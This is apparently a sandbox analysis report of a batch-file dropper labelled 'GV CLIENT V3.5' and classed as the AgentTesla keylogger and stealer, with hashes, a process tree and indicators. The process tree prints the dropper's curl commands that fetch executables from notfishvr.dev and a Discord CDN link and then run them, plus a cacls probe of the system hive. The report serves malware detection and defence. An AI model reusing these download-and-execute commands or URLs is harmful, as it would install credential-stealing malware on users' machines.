agenttesla | 770eedd081641838d18c615b60ea2658febcb6bb19a35a0fe1c569eeedb8026d

Analysis

max time kernel
5s
max time network
15s
platform
windows11-21h2_x64
resource
win11-20231128-en
resource tags

arch:x64arch:x86image:win11-20231128-enlocale:en-usos:windows11-21h2-x64system
submitted
03-12-2023 20:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

#𝔾𝕍 ℂ𝕃𝕀𝔼ℕ𝕋 𝕍𝟛.𝟝.bat
Size

20KB
MD5

a7793c10f4e024c789964be67375ab2a
SHA1

988d0af9a4ca435dd084ce541a250f6ba57f590a
SHA256

770eedd081641838d18c615b60ea2658febcb6bb19a35a0fe1c569eeedb8026d
SHA512

50e2b5c410fc1d865f446214bfc655ca64fcd17bde6e840f89bf4ecd2970203a173fc0d388a18cfd838b61bea397c0c9c851d7c946ec8d4343787162cd772f83
SSDEEP

384:QNJuPLwF+5InJhMFcJqJ+C7inKvcO3oF57talCp1h2wHdpIhG/8J/D8Au99mmBkn:CJuT48InJhMFcJqJ+C7inKvcO3oF57tO

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

AgentTesla payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2980-12-0x0000028B506F0000-0x0000028B50906000-memory.dmp	family_agenttesla

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

GV-Loader.exe

pid process

2980 GV-Loader.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

4500 notepad.exe

pid	process
2980	GV-Loader.exe

pid	process
4500	notepad.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 776 wrote to memory of 4116	776	cmd.exe	cacls.exe
PID 776 wrote to memory of 4116	776	cmd.exe	cacls.exe
PID 776 wrote to memory of 4700	776	cmd.exe	curl.exe
PID 776 wrote to memory of 4700	776	cmd.exe	curl.exe
PID 776 wrote to memory of 1752	776	cmd.exe	curl.exe
PID 776 wrote to memory of 1752	776	cmd.exe	curl.exe
PID 776 wrote to memory of 4844	776	cmd.exe	curl.exe
PID 776 wrote to memory of 4844	776	cmd.exe	curl.exe
PID 776 wrote to memory of 4500	776	cmd.exe	notepad.exe
PID 776 wrote to memory of 4500	776	cmd.exe	notepad.exe
PID 776 wrote to memory of 2980	776	cmd.exe	GV-Loader.exe
PID 776 wrote to memory of 2980	776	cmd.exe	GV-Loader.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\#𝔾𝕍 ℂ𝕃𝕀𝔼ℕ𝕋 𝕍𝟛.𝟝.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:776

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
2⤵
PID:4116

C:\Windows\system32\curl.exe
curl -s -o C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe https://notfishvr.dev/cdn/GV-Loader.exe
2⤵
PID:4700

C:\Windows\system32\curl.exe
curl -s -o C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt https://cdn.discordapp.com/attachments/1171187025349709937/1176654675664191598/HOW_TO_USE.txt
2⤵
PID:1752

C:\Windows\system32\curl.exe
curl -s -o C:\Users\Admin\AppData\Roaming\a.exe https://cdn.discordapp.com/attachments/1172213687210225774/1179899267909951589/a.exe
2⤵
PID:4844

C:\Windows\system32\notepad.exe
notepad.exe C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:4500

C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe
C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe
2⤵
- Executes dropped EXE
PID:2980

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe

Filesize
1.6MB

MD5
7954b6812ec1eefe82b89dea0c1c8001

SHA1
db444d74258448e24d7aa1a26d71cea4c7fe492b

SHA256
42810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231

SHA512
bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5

Download Submit
C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe

Filesize
1.6MB

MD5
7954b6812ec1eefe82b89dea0c1c8001

SHA1
db444d74258448e24d7aa1a26d71cea4c7fe492b

SHA256
42810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231

SHA512
bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5

Download Submit
C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt

Filesize
555B

MD5
1c01acde55c409853a8bb588c523e810

SHA1
f4be783a9aaec4a89e3631b4e843fcc7d44bfdda

SHA256
a851dc4829abc9a3dc25f7f2959de008a151f11c934635f09e16926b73625872

SHA512
700bd27279429849f8392de2f0c36c842fed1b12baa5bf8b15e4d56116d44a0161f8a11d4e4a97af81c3ad09c1e842e5e26ff26252b8d4ff59a90f506f001372

Download Submit
C:\Users\Admin\AppData\Roaming\a.exe

Filesize
227B

MD5
25421ac6c89c87e6b09f2ca856a6c9d3

SHA1
2256c3f1078b0772e8e5aa09b6b97788c906da41

SHA256
05e5eada548b1af4ef497f1f77f2fcaac19a4349aeab85882009db5552345876

SHA512
ccf7aa0ad47ee19fa0dcc7a7d2493be8dde47b9af41bb6486c23d2c7fbaf6299971d6df7fc96282cbccbe711c77f7305bc37446be386938108b1e96e0cc2cbc5

Download Submit
memory/2980-8-0x0000028B35EA0000-0x0000028B36042000-memory.dmp

Filesize
1.6MB

Download
memory/2980-9-0x00007FFA8CF80000-0x00007FFA8DA42000-memory.dmp

Filesize
10.8MB

Download
memory/2980-10-0x0000028B36490000-0x0000028B364A2000-memory.dmp

Filesize
72KB

Download
memory/2980-11-0x0000028B506E0000-0x0000028B506F0000-memory.dmp

Filesize
64KB

Download
memory/2980-12-0x0000028B506F0000-0x0000028B50906000-memory.dmp

Filesize
2.1MB

Download
memory/2980-13-0x0000028B50D80000-0x0000028B50DBC000-memory.dmp

Filesize
240KB

Download